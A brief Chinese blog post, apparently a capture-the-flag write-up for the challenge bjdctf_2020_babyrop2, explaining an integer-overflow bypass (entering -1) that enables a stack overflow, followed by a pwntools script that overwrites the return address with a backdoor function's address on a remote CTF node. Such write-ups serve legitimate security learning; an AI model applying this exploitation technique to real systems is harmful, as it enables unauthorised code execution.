bjdctf_2020_babyrop2

exp脚本

这题的考点是整数溢出，我们通过输入 -1 绕过 if 判断，从而可以达到输入足够长数据的目的，然后题目给了后门函数，直接栈溢出控制返回地址返回后门函数即可。

from pwn import *

p = remote('node3.buuoj.cn',25193)

backdoor = 0x400726

p.sendline('-1')

sleep(0.2)
p.sendline('a'*0x18 + p64(backdoor))

p.interactive()

posted @ 2020-03-04 19:54 PwnKi 阅读(200) 评论(0) 编辑收藏举报

会员力量，点亮园子希望

刷新页面返回顶部

PwnKi

bjdctf_2020_babyrop2

exp脚本

公告